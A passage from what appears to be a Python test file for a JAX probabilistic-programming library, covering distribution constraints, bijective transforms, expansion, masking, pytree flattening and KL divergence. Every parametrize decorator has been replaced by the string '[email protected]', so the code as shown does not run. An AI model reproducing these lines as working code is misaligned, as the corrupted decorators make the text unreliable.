ValueError\n oob_samples = gen_values_outside_bounds(\n d.support, size=prepend_shape + d.batch_shape + d.event_shape\n )\n with pytest.warns(UserWarning, match=\"Out-of-support\"):\n d.log_prob(oob_samples)\n\n with pytest.warns(UserWarning, match=\"Out-of-support\"):\n # test warning work under jit omnistaging\n oob_samples = jax.device_get(oob_samples)\n valid_params = jax.device_get(valid_params)\n\n def log_prob_fn():\n d = jax_dist(*valid_params, validate_args=True)\n return d.log_prob(oob_samples)\n\n jax.jit(log_prob_fn)()\n\n\ndef test_omnistaging_invalid_param():\n def f(x):\n return dist.LogNormal(x, -np.ones(2), validate_args=True).log_prob(0)\n\n with pytest.raises(ValueError, match=\"got invalid\"):\n jax.jit(f)(0)\n\n\ndef test_omnistaging_invalid_sample():\n def f(x):\n return dist.LogNormal(x, np.ones(2), validate_args=True).log_prob(-1)\n\n with pytest.warns(UserWarning, match=\"Out-of-support\"):\n jax.jit(f)(0)\n\n\ndef test_categorical_log_prob_grad():\n data = jnp.repeat(jnp.arange(3), 10)\n\n def f(x):\n return (\n dist.Categorical(jax.nn.softmax(x * jnp.arange(1, 4))).log_prob(data).sum()\n )\n\n def g(x):\n return dist.Categorical(logits=x * jnp.arange(1, 4)).log_prob(data).sum()\n\n x = 0.5\n fx, grad_fx = jax.value_and_grad(f)(x)\n gx, grad_gx = jax.value_and_grad(g)(x)\n assert_allclose(fx, gx, rtol=1e-6)\n assert_allclose(grad_fx, grad_gx, atol=1e-4)\n\n\ndef test_beta_proportion_invalid_mean():\n with dist.distribution.validation_enabled(), pytest.raises(\n ValueError, match=r\"^BetaProportion distribution got invalid mean parameter\\.$\"\n ):\n dist.BetaProportion(1.0, 1.0)\n\n\n########################################\n# Tests for constraints and transforms #\n########################################\n\n\[email protected](\n \"constraint, x, expected\",\n [\n (constraints.boolean, np.array([True, False]), np.array([True, True])),\n (constraints.boolean, np.array([1, 1]), np.array([True, True])),\n (constraints.boolean, np.array([-1, 1]), np.array([False, True])),\n (\n constraints.corr_cholesky,\n np.array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]),\n np.array([True, False]),\n ), # NB: not lower_triangular\n (\n constraints.corr_cholesky,\n np.array([[[1, 0], [1, 0]], [[1, 0], [0.5, 0.5]]]),\n np.array([False, False]),\n ), # NB: not positive_diagonal & not 
unit_norm_row\n (\n constraints.corr_matrix,\n np.array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]),\n np.array([True, False]),\n ), # NB: not lower_triangular\n (\n constraints.corr_matrix,\n np.array([[[1, 0], [1, 0]], [[1, 0], [0.5, 0.5]]]),\n np.array([False, False]),\n ), # NB: not unit diagonal\n (constraints.greater_than(1), 3, True),\n (\n constraints.greater_than(1),\n np.array([-1, 1, 5]),\n np.array([False, False, True]),\n ),\n (constraints.integer_interval(-3, 5), 0, True),\n (\n constraints.integer_interval(-3, 5),\n np.array([-5, -3, 0, 1.1, 5, 7]),\n np.array([False, True, True, False, True, False]),\n ),\n (constraints.interval(-3, 5), 0, True),\n (\n constraints.interval(-3, 5),\n np.array([-5, -3, 0, 5, 7]),\n np.array([False, True, True, True, False]),\n ),\n (constraints.less_than(1), -2, True),\n (\n constraints.less_than(1),\n np.array([-1, 1, 5]),\n np.array([True, False, False]),\n ),\n (constraints.lower_cholesky, np.array([[1.0, 0.0], [-2.0, 0.1]]), True),\n (\n constraints.lower_cholesky,\n np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0, 0.1], [2.0, 0.2]]]),\n np.array([False, False]),\n ),\n (constraints.nonnegative_integer, 3, True),\n (\n constraints.nonnegative_integer,\n np.array([-1.0, 0.0, 5.0]),\n np.array([False, True, True]),\n ),\n (constraints.positive, 3, True),\n (constraints.positive, np.array([-1, 0, 5]), np.array([False, False, True])),\n (constraints.positive_definite, np.array([[1.0, 0.3], [0.3, 1.0]]), True),\n (\n constraints.positive_definite,\n np.array([[[2.0, 0.4], [0.3, 2.0]], [[1.0, 0.1], [0.1, 0.0]]]),\n np.array([False, False]),\n ),\n (constraints.positive_integer, 3, True),\n (\n constraints.positive_integer,\n np.array([-1.0, 0.0, 5.0]),\n np.array([False, False, True]),\n ),\n (constraints.real, -1, True),\n (\n constraints.real,\n np.array([np.inf, -np.inf, np.nan, np.pi]),\n np.array([False, False, False, True]),\n ),\n (constraints.simplex, np.array([0.1, 0.3, 0.6]), True),\n (\n constraints.simplex,\n np.array([[0.1, 0.3, 0.6], [-0.1, 0.6, 0.5], [0.1, 0.6, 0.5]]),\n np.array([True, False, False]),\n ),\n (constraints.softplus_positive, 3, True),\n (\n constraints.softplus_positive,\n np.array([-1, 0, 5]),\n np.array([False, False, True]),\n ),\n (\n constraints.softplus_lower_cholesky,\n np.array([[1.0, 0.0], [-2.0, 0.1]]),\n True,\n ),\n (\n constraints.softplus_lower_cholesky,\n np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0, 0.1], [2.0, 0.2]]]),\n np.array([False, False]),\n ),\n (constraints.unit_interval, 0.1, True),\n (\n constraints.unit_interval,\n np.array([-5, 0, 0.5, 1, 7]),\n np.array([False, True, True, True, False]),\n ),\n (\n constraints.sphere,\n np.array([[1, 0, 0], [0.5, 0.5, 0]]),\n np.array([True, False]),\n ),\n (\n constraints.open_interval(0.0, 1.0),\n np.array([-5, 0, 0.5, 1, 7]),\n np.array([False, False, True, False, False]),\n ),\n ],\n)\ndef test_constraints(constraint, x, expected):\n v = constraint.feasible_like(x)\n if jnp.result_type(v) == \"float32\" or jnp.result_type(v) == \"float64\":\n assert not constraint.is_discrete\n assert_array_equal(constraint(x), expected)\n\n feasible_value = constraint.feasible_like(x)\n assert jnp.shape(feasible_value) == jnp.shape(x)\n assert_allclose(constraint(feasible_value), jnp.full(jnp.shape(expected), True))\n\n try:\n inverse = biject_to(constraint).inv(feasible_value)\n except NotImplementedError:\n pass\n else:\n assert_allclose(inverse, jnp.zeros_like(inverse), atol=2e-7)\n\n\[email protected](\n \"constraint\",\n [\n constraints.corr_cholesky,\n 
constraints.corr_matrix,\n constraints.greater_than(2),\n constraints.interval(-3, 5),\n constraints.l1_ball,\n constraints.less_than(1),\n constraints.lower_cholesky,\n constraints.scaled_unit_lower_cholesky,\n constraints.ordered_vector,\n constraints.positive,\n constraints.positive_definite,\n constraints.positive_ordered_vector,\n constraints.real,\n constraints.real_vector,\n constraints.simplex,\n constraints.softplus_positive,\n constraints.softplus_lower_cholesky,\n constraints.unit_interval,\n constraints.open_interval(0.0, 1.0),\n ],\n ids=lambda x: x.__class__,\n)\[email protected](\"shape\", [(), (1,), (3,), (6,), (3, 1), (1, 3), (5, 3)])\ndef test_biject_to(constraint, shape):\n transform = biject_to(constraint)\n event_dim = transform.domain.event_dim\n if isinstance(constraint, constraints._Interval):\n assert transform.codomain.upper_bound == constraint.upper_bound\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._GreaterThan):\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._LessThan):\n assert transform.codomain.upper_bound == constraint.upper_bound\n if len(shape) < event_dim:\n return\n rng_key = random.PRNGKey(0)\n x = random.normal(rng_key, shape)\n y = transform(x)\n\n assert transform.forward_shape(x.shape) == y.shape\n assert transform.inverse_shape(y.shape) == x.shape\n\n # test inv work for NaN arrays:\n x_nan = transform.inv(jnp.full(jnp.shape(y), np.nan))\n assert x_nan.shape == x.shape\n\n # test codomain\n batch_shape = shape if event_dim == 0 else shape[:-1]\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape, dtype=jnp.bool_))\n\n # test inv\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-5, rtol=1e-5)\n\n # test domain, currently all is constraints.real or constraints.real_vector\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n\n # test log_abs_det_jacobian\n actual = transform.log_abs_det_jacobian(x, y)\n assert jnp.shape(actual) == batch_shape\n if len(shape) == event_dim:\n if constraint is constraints.simplex:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x)[:-1, :])[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y)[:, :-1])[1]\n elif constraint in [\n constraints.real_vector,\n constraints.ordered_vector,\n constraints.positive_ordered_vector,\n constraints.l1_ball,\n ]:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n elif constraint in [constraints.corr_cholesky, constraints.corr_matrix]:\n vec_transform = lambda x: matrix_to_tril_vec( # noqa: E731\n transform(x), diagonal=-1\n )\n y_tril = matrix_to_tril_vec(y, diagonal=-1)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y, diagonal=-1)\n if constraint is constraints.corr_matrix:\n # fill the upper triangular part\n matrix = (\n matrix\n + jnp.swapaxes(matrix, -2, -1)\n + jnp.identity(matrix.shape[-1])\n )\n return transform.inv(matrix)\n\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform)(y_tril))[1]\n elif constraint in [\n constraints.lower_cholesky,\n constraints.scaled_unit_lower_cholesky,\n constraints.positive_definite,\n constraints.softplus_lower_cholesky,\n ]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x)) # noqa: E731\n y_tril = matrix_to_tril_vec(y)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y)\n if 
constraint is constraints.positive_definite:\n # fill the upper triangular part\n matrix = (\n matrix\n + jnp.swapaxes(matrix, -2, -1)\n - jnp.diag(jnp.diag(matrix))\n )\n return transform.inv(matrix)\n\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform)(y_tril))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n\n assert_allclose(actual, expected, atol=1e-5, rtol=1e-5)\n assert_allclose(actual, -inv_expected, atol=1e-5, rtol=1e-5)\n\n\n# NB: skip transforms which are tested in `test_biject_to`\[email protected](\n \"transform, event_shape\",\n [\n (PermuteTransform(np.array([3, 0, 4, 1, 2])), (5,)),\n (PowerTransform(2.0), ()),\n (SoftplusTransform(), ()),\n (\n LowerCholeskyAffine(\n np.array([1.0, 2.0]), np.array([[0.6, 0.0], [1.5, 0.4]])\n ),\n (2,),\n ),\n (\n transforms.ComposeTransform(\n [\n biject_to(constraints.simplex),\n SimplexToOrderedTransform(0.0),\n biject_to(constraints.ordered_vector).inv,\n ]\n ),\n (5,),\n ),\n ],\n)\[email protected](\n \"batch_shape\",\n [\n (),\n (1,),\n (3,),\n (6,),\n (3, 1),\n (1, 3),\n (5, 3),\n ],\n)\ndef test_bijective_transforms(transform, event_shape, batch_shape):\n shape = batch_shape + event_shape\n rng_key = random.PRNGKey(0)\n x = biject_to(transform.domain)(random.normal(rng_key, shape))\n y = transform(x)\n\n # test codomain\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape))\n\n # test inv\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-6, rtol=1e-4)\n assert transform.inv.inv is transform\n assert transform.inv is transform.inv\n assert transform.domain is transform.inv.codomain\n assert transform.codomain is transform.inv.domain\n\n # test domain\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n\n # test log_abs_det_jacobian\n actual = transform.log_abs_det_jacobian(x, y)\n assert_allclose(actual, -transform.inv.log_abs_det_jacobian(y, x))\n assert jnp.shape(actual) == batch_shape\n if len(shape) == transform.domain.event_dim:\n if len(event_shape) == 1:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n\n assert_allclose(actual, expected, atol=1e-6)\n assert_allclose(actual, -inv_expected, atol=1e-6)\n\n\[email protected](\"batch_shape\", [(), (5,)])\ndef test_composed_transform(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t1])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 2\n\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n expected_log_det = (\n jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, y / 2) + jnp.log(2) * 9\n )\n assert_allclose(log_det, expected_log_det)\n\n\[email protected](\"batch_shape\", [(), (5,)])\ndef test_composed_transform_1(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t2])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 3\n\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n z = t2(x * 2)\n expected_log_det = (\n jnp.log(2) * 
6\n + t2.log_abs_det_jacobian(x * 2, z)\n + t2.log_abs_det_jacobian(z, t2(z)).sum(-1)\n )\n assert_allclose(log_det, expected_log_det)\n\n\[email protected](\"batch_shape\", [(), (5,)])\ndef test_simplex_to_order_transform(batch_shape):\n simplex = jnp.arange(5.0) / jnp.arange(5.0).sum()\n simplex = jnp.broadcast_to(simplex, batch_shape + simplex.shape)\n transform = SimplexToOrderedTransform()\n out = transform(simplex)\n assert out.shape == transform.forward_shape(simplex.shape)\n assert simplex.shape == transform.inverse_shape(out.shape)\n\n\[email protected](\"batch_shape\", [(), (5,)])\[email protected](\"prepend_event_shape\", [(), (4,)])\[email protected](\"sample_shape\", [(), (7,)])\ndef test_transformed_distribution(batch_shape, prepend_event_shape, sample_shape):\n base_dist = (\n dist.Normal(0, 1)\n .expand(batch_shape + prepend_event_shape + (6,))\n .to_event(1 + len(prepend_event_shape))\n )\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n d = dist.TransformedDistribution(base_dist, [t1, t2, t1])\n assert d.event_dim == 2 + len(prepend_event_shape)\n\n y = d.sample(random.PRNGKey(0), sample_shape)\n t = transforms.ComposeTransform([t1, t2, t1])\n x = t.inv(y)\n assert x.shape == sample_shape + base_dist.shape()\n log_prob = d.log_prob(y)\n assert log_prob.shape == sample_shape + batch_shape\n t_log_det = t.log_abs_det_jacobian(x, y)\n if prepend_event_shape:\n t_log_det = t_log_det.sum(-1)\n expected_log_prob = base_dist.log_prob(x) - t_log_det\n assert_allclose(log_prob, expected_log_prob, atol=1e-5)\n\n\[email protected](\n \"transformed_dist\",\n [\n dist.TransformedDistribution(\n dist.Normal(np.array([2.0, 3.0]), 1.0), transforms.ExpTransform()\n ),\n dist.TransformedDistribution(\n dist.Exponential(jnp.ones(2)),\n [\n transforms.PowerTransform(0.7),\n transforms.AffineTransform(0.0, jnp.ones(2) * 3),\n ],\n ),\n ],\n)\ndef test_transformed_distribution_intermediates(transformed_dist):\n sample, intermediates = transformed_dist.sample_with_intermediates(\n random.PRNGKey(1)\n )\n assert_allclose(\n transformed_dist.log_prob(sample, intermediates),\n transformed_dist.log_prob(sample),\n )\n\n\ndef test_transformed_transformed_distribution():\n loc, scale = -2, 3\n dist1 = dist.TransformedDistribution(\n dist.Normal(2, 3), transforms.PowerTransform(2.0)\n )\n dist2 = dist.TransformedDistribution(dist1, transforms.AffineTransform(-2, 3))\n assert isinstance(dist2.base_dist, dist.Normal)\n assert len(dist2.transforms) == 2\n assert isinstance(dist2.transforms[0], transforms.PowerTransform)\n assert isinstance(dist2.transforms[1], transforms.AffineTransform)\n\n rng_key = random.PRNGKey(0)\n assert_allclose(loc + scale * dist1.sample(rng_key), dist2.sample(rng_key))\n intermediates = dist2.sample_with_intermediates(rng_key)\n assert len(intermediates) == 2\n\n\ndef _make_iaf(input_dim, hidden_dims, rng_key):\n arn_init, arn = AutoregressiveNN(input_dim, hidden_dims, param_dims=[1, 1])\n _, init_params = arn_init(rng_key, (input_dim,))\n return InverseAutoregressiveTransform(partial(arn, init_params))\n\n\[email protected](\n \"ts\",\n [\n [transforms.PowerTransform(0.7), transforms.AffineTransform(2.0, 3.0)],\n [transforms.ExpTransform()],\n [\n transforms.ComposeTransform(\n [transforms.AffineTransform(-2, 3), transforms.ExpTransform()]\n ),\n transforms.PowerTransform(3.0),\n ],\n [\n _make_iaf(5, hidden_dims=[10], rng_key=random.PRNGKey(0)),\n transforms.PermuteTransform(jnp.arange(5)[::-1]),\n _make_iaf(5, hidden_dims=[10], 
rng_key=random.PRNGKey(1)),\n ],\n ],\n)\ndef test_compose_transform_with_intermediates(ts):\n transform = transforms.ComposeTransform(ts)\n x = random.normal(random.PRNGKey(2), (7, 5))\n y, intermediates = transform.call_with_intermediates(x)\n logdet = transform.log_abs_det_jacobian(x, y, intermediates)\n assert_allclose(y, transform(x))\n assert_allclose(logdet, transform.log_abs_det_jacobian(x, y))\n\n\[email protected](\"x_dim, y_dim\", [(3, 3), (3, 4)])\ndef test_unpack_transform(x_dim, y_dim):\n xy = np.random.randn(x_dim + y_dim)\n unpack_fn = lambda xy: {\"x\": xy[:x_dim], \"y\": xy[x_dim:]} # noqa: E731\n transform = transforms.UnpackTransform(unpack_fn)\n z = transform(xy)\n if x_dim == y_dim:\n with pytest.warns(UserWarning, match=\"UnpackTransform.inv\"):\n t = transform.inv(z)\n else:\n t = transform.inv(z)\n\n assert_allclose(t, xy)\n\n\[email protected](\"jax_dist, sp_dist, params\", CONTINUOUS)\ndef test_generated_sample_distribution(\n jax_dist, sp_dist, params, N_sample=100_000, key=random.PRNGKey(11)\n):\n \"\"\"On samplers that we do not get directly from JAX, (e.g. we only get\n Gumbel(0,1) but also provide samplers for Gumbel(loc, scale)), also test\n agreement in the empirical distribution of generated samples between our\n samplers and those from SciPy.\n \"\"\"\n\n if jax_dist not in [dist.Gumbel]:\n pytest.skip(\n \"{} sampling method taken from upstream, no need to\"\n \"test generated samples.\".format(jax_dist.__name__)\n )\n\n jax_dist = jax_dist(*params)\n if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:\n our_samples = jax_dist.sample(key, (N_sample,))\n ks_result = osp.kstest(our_samples, sp_dist(*params).cdf)\n assert ks_result.pvalue > 0.05\n\n\[email protected](\n \"jax_dist, params, support\",\n [\n (dist.BernoulliLogits, (5.0,), jnp.arange(2)),\n (dist.BernoulliProbs, (0.5,), jnp.arange(2)),\n (dist.BinomialLogits, (4.5, 10), jnp.arange(11)),\n (dist.BinomialProbs, (0.5, 11), jnp.arange(12)),\n (dist.BetaBinomial, (2.0, 0.5, 12), jnp.arange(13)),\n (dist.CategoricalLogits, (np.array([3.0, 4.0, 5.0]),), jnp.arange(3)),\n (dist.CategoricalProbs, (np.array([0.1, 0.5, 0.4]),), jnp.arange(3)),\n ],\n)\[email protected](\"batch_shape\", [(5,), ()])\[email protected](\"expand\", [False, True])\ndef test_enumerate_support_smoke(jax_dist, params, support, batch_shape, expand):\n p0 = jnp.broadcast_to(params[0], batch_shape + jnp.shape(params[0]))\n actual = jax_dist(p0, *params[1:]).enumerate_support(expand=expand)\n expected = support.reshape((-1,) + (1,) * len(batch_shape))\n if expand:\n expected = jnp.broadcast_to(expected, support.shape + batch_shape)\n assert_allclose(actual, expected)\n\n\ndef test_zero_inflated_enumerate_support():\n base_dist = dist.Bernoulli(0.5)\n d = dist.ZeroInflatedDistribution(base_dist, gate=0.5)\n assert d.has_enumerate_support\n assert_allclose(d.enumerate_support(), base_dist.enumerate_support())\n\n\[email protected](\"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE)\[email protected](\"prepend_shape\", [(), (2, 3)])\[email protected](\"sample_shape\", [(), (4,)])\ndef test_expand(jax_dist, sp_dist, params, prepend_shape, sample_shape):\n jax_dist = jax_dist(*params)\n new_batch_shape = prepend_shape + jax_dist.batch_shape\n expanded_dist = jax_dist.expand(new_batch_shape)\n rng_key = random.PRNGKey(0)\n samples = expanded_dist.sample(rng_key, sample_shape)\n assert expanded_dist.batch_shape == new_batch_shape\n assert samples.shape == sample_shape + new_batch_shape + jax_dist.event_shape\n assert 
expanded_dist.log_prob(samples).shape == sample_shape + new_batch_shape\n # test expand of expand\n assert (\n expanded_dist.expand((3,) + new_batch_shape).batch_shape\n == (3,) + new_batch_shape\n )\n # test expand error\n if prepend_shape:\n with pytest.raises(ValueError, match=\"Cannot broadcast distribution of shape\"):\n assert expanded_dist.expand((3,) + jax_dist.batch_shape)\n\n\[email protected](\"base_shape\", [(2, 1, 5), (3, 1), (2, 1, 1), (1, 1, 5)])\[email protected](\"event_dim\", [0, 1, 2, 3])\[email protected](\"sample_shape\", [(1000,), (1000, 7, 1), (1000, 1, 7)])\ndef test_expand_shuffle_regression(base_shape, event_dim, sample_shape):\n expand_shape = (2, 3, 5)\n event_dim = min(event_dim, len(base_shape))\n loc = random.normal(random.PRNGKey(0), base_shape) * 10\n base_dist = dist.Normal(loc, 0.1).to_event(event_dim)\n expanded_dist = base_dist.expand(expand_shape[: len(expand_shape) - event_dim])\n samples = expanded_dist.sample(random.PRNGKey(1), sample_shape)\n expected_mean = jnp.broadcast_to(loc, sample_shape[1:] + expanded_dist.shape())\n assert_allclose(samples.mean(0), expected_mean, atol=0.1)\n\n\[email protected](\"batch_shape\", [(), (4,), (10, 3)])\ndef test_sine_bivariate_von_mises_batch_shape(batch_shape):\n phi_loc = jnp.broadcast_to(jnp.array(0.0), batch_shape)\n psi_loc = jnp.array(0.0)\n phi_conc = jnp.array(1.0)\n psi_conc = jnp.array(1.0)\n corr = jnp.array(0.1)\n\n sine = SineBivariateVonMises(phi_loc, psi_loc, phi_conc, psi_conc, corr)\n assert sine.batch_shape == batch_shape\n\n samples = sine.sample(random.PRNGKey(0))\n assert samples.shape == (*batch_shape, 2)\n\n\ndef test_sine_bivariate_von_mises_sample_mean():\n loc = jnp.array([[2.0, -1.0], [-2, 1.0]])\n\n sine = SineBivariateVonMises(*loc, 5000, 5000, 0.0)\n samples = sine.sample(random.PRNGKey(0), (5000,))\n\n assert_allclose(_circ_mean(samples).T, loc, rtol=5e-3)\n\n\[email protected](\"batch_shape\", [(), (4,)])\ndef test_polya_gamma(batch_shape, num_points=20000):\n d = dist.TruncatedPolyaGamma(batch_shape=batch_shape)\n rng_key = random.PRNGKey(0)\n\n # test density approximately normalized\n x = jnp.linspace(1.0e-6, d.truncation_point, num_points)\n prob = (d.truncation_point / num_points) * jnp.exp(\n logsumexp(d.log_prob(x), axis=-1)\n )\n assert_allclose(prob, jnp.ones(batch_shape), rtol=1.0e-4)\n\n # test mean of approximate sampler\n z = d.sample(rng_key, sample_shape=(3000,))\n mean = jnp.mean(z, axis=-1)\n assert_allclose(mean, 0.25 * jnp.ones(batch_shape), rtol=0.07)\n\n\[email protected](\n \"extra_event_dims,expand_shape\",\n [(0, (4, 3, 2, 1)), (0, (4, 3, 2, 2)), (1, (5, 4, 3, 2)), (2, (5, 4, 3))],\n)\ndef test_expand_reshaped_distribution(extra_event_dims, expand_shape):\n loc = jnp.zeros((1, 6))\n scale_tril = jnp.eye(6)\n d = dist.MultivariateNormal(loc, scale_tril=scale_tril)\n full_shape = (4, 1, 1, 1, 6)\n reshaped_dist = d.expand([4, 1, 1, 1]).to_event(extra_event_dims)\n cut = 4 - extra_event_dims\n batch_shape, event_shape = full_shape[:cut], full_shape[cut:]\n assert reshaped_dist.batch_shape == batch_shape\n assert reshaped_dist.event_shape == event_shape\n large = reshaped_dist.expand(expand_shape)\n assert large.batch_shape == expand_shape\n assert large.event_shape == event_shape\n\n # Throws error when batch shape cannot be broadcasted\n with pytest.raises((RuntimeError, ValueError)):\n reshaped_dist.expand(expand_shape + (3,))\n\n # Throws error when trying to shrink existing batch shape\n with pytest.raises((RuntimeError, ValueError)):\n 
large.expand(expand_shape[1:])\n\n\[email protected](\n \"batch_shape, mask_shape\",\n [((), ()), ((2,), ()), ((), (2,)), ((2,), (2,)), ((4, 2), (1, 2)), ((2,), (4, 2))],\n)\[email protected](\"event_shape\", [(), (3,)])\ndef test_mask(batch_shape, event_shape, mask_shape):\n jax_dist = (\n dist.Normal().expand(batch_shape + event_shape).to_event(len(event_shape))\n )\n mask = dist.Bernoulli(0.5).sample(random.PRNGKey(0), mask_shape)\n if mask_shape == ():\n mask = bool(mask)\n samples = jax_dist.sample(random.PRNGKey(1))\n actual = jax_dist.mask(mask).log_prob(samples)\n assert_allclose(\n actual != 0,\n jnp.broadcast_to(mask, lax.broadcast_shapes(batch_shape, mask_shape)),\n )\n\n\[email protected](\"event_shape\", [(), (4,), (2, 4)])\ndef test_mask_grad(event_shape):\n def f(x, data):\n base_dist = dist.Beta(jnp.exp(x), jnp.ones(event_shape)).to_event()\n mask = jnp.all(\n jnp.isfinite(data), tuple(-i - 1 for i in range(len(event_shape)))\n )\n log_prob = base_dist.mask(mask).log_prob(data)\n assert log_prob.shape == data.shape[: len(data.shape) - len(event_shape)]\n return log_prob.sum()\n\n data = np.array([[0.4, np.nan, 0.2, np.nan], [0.5, 0.5, 0.5, 0.5]])\n log_prob, grad = jax.value_and_grad(f)(1.0, data)\n assert jnp.isfinite(grad) and jnp.isfinite(log_prob)\n\n\[email protected](\n \"jax_dist, sp_dist, params\", CONTINUOUS + DISCRETE + DIRECTIONAL\n)\ndef test_dist_pytree(jax_dist, sp_dist, params):\n def f(x):\n return jax_dist(*params)\n\n if jax_dist is _ImproperWrapper:\n pytest.skip(\"Cannot flattening ImproperUniform\")\n if jax_dist is dist.EulerMaruyama:\n pytest.skip(\"EulerMaruyama doesn't define flatten/unflatten\")\n jax.jit(f)(0) # this test for flatten/unflatten\n lax.map(f, np.ones(3)) # this test for compatibility w.r.t. scan\n # Test that parameters do not change after flattening.\n expected_dist = f(0)\n actual_dist = jax.jit(f)(0)\n expected_sample = expected_dist.sample(random.PRNGKey(0))\n actual_sample = actual_dist.sample(random.PRNGKey(0))\n expected_log_prob = expected_dist.log_prob(expected_sample)\n actual_log_prob = actual_dist.log_prob(actual_sample)\n assert_allclose(actual_sample, expected_sample, rtol=1e-6)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-6)\n\n\[email protected](\n \"method, arg\", [(\"to_event\", 1), (\"mask\", False), (\"expand\", [5])]\n)\ndef test_special_dist_pytree(method, arg):\n def f(x):\n d = dist.Normal(np.zeros(1), np.ones(1))\n return getattr(d, method)(arg)\n\n jax.jit(f)(0)\n lax.map(f, np.ones(3))\n\n\ndef test_expand_no_unnecessary_batch_shape_expansion():\n # ExpandedDistribution can mutate the `batch_shape` of\n # its base distribution in order to make ExpandedDistribution\n # mappable, see #684. 
However, this mutation should not take\n # place if no mapping operation is performed.\n\n for arg in (jnp.array(1.0), jnp.ones((2,)), jnp.ones((2, 2))):\n # Low level test: ensure that (tree_flatten o tree_unflatten)(expanded_dist)\n # amounts to an identity operation.\n d = dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n roundtripped_d = type(d).tree_unflatten(*d.tree_flatten()[::-1])\n assert d.batch_shape == roundtripped_d.batch_shape\n assert d.base_dist.batch_shape == roundtripped_d.base_dist.batch_shape\n assert d.base_dist.event_shape == roundtripped_d.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, roundtripped_d.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, roundtripped_d.base_dist.scale)\n\n # High-level test: `jax.jit`ting a function returning an ExpandedDistribution\n # (which involves an instance of the low-level case as it will transform\n # the original function by adding some flattening and unflattening steps)\n # should return same object as its non-jitted equivalent.\n def bs(arg):\n return dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n\n d = bs(arg)\n dj = jax.jit(bs)(arg)\n\n assert isinstance(d, dist.ExpandedDistribution)\n assert isinstance(dj, dist.ExpandedDistribution)\n\n assert d.batch_shape == dj.batch_shape\n assert d.base_dist.batch_shape == dj.base_dist.batch_shape\n assert d.base_dist.event_shape == dj.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, dj.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, dj.base_dist.scale)\n\n\[email protected](\"batch_shape\", [(), (4,), (2, 3)], ids=str)\ndef test_kl_delta_normal_shape(batch_shape):\n v = np.random.normal(size=batch_shape)\n loc = np.random.normal(size=batch_shape)\n scale = np.exp(np.random.normal(size=batch_shape))\n p = dist.Delta(v)\n q = dist.Normal(loc, scale)\n assert kl_divergence(p, q).shape == batch_shape\n\n\ndef test_kl_delta_normal():\n v = np.random.normal()\n loc = np.random.normal()\n scale = np.exp(np.random.normal())\n p = dist.Delta(v, 10.0)\n q = dist.Normal(loc, scale)\n assert_allclose(kl_divergence(p, q), 10.0 - q.log_prob(v))\n\n\[email protected](\"batch_shape\", [(), (4,), (2, 3)], ids=str)\[email protected](\"event_shape\", [(), (4,), (2, 3)], ids=str)\ndef test_kl_independent_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(size=shape)))\n q = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(size=shape)))\n actual = kl_divergence(\n dist.Independent(p, len(event_shape)), dist.Independent(q, len(event_shape))\n )\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected](\"batch_shape\", [(), (4,), (2, 3)], ids=str)\[email protected](\"event_shape\", [(), (4,), (2, 3)], ids=str)\ndef test_kl_expanded_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(shape)\n q = dist.Normal(np.random.normal(), 